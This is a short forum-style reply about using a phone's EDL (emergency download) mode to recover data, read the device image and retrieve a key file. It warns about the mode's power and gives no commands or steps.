Should you actually manage to boot into EDL mode - Assuming it exists and is unlocked - then BEWARE: EDL mode is very low level and any command can directly affect the kernel or compromise the system. Don't use commands you're not sure what do they do.
You can use EDL mode to recover the data from the phone then wipe it clean, then restore the data.
You cannot access memory with EDL mode, but you can access the current image on your device. And from which you can get the key file.
EDL mode is a very very powerful tool (Much more powerful than debugging, fastboot, or anything you may know of) as it doesn't need unlocked bootloader to use it and through which you can do anything to your device including flashing other ROMs.
Good luck on your impossible quest. Make sure to post updates should you find yourself stuck.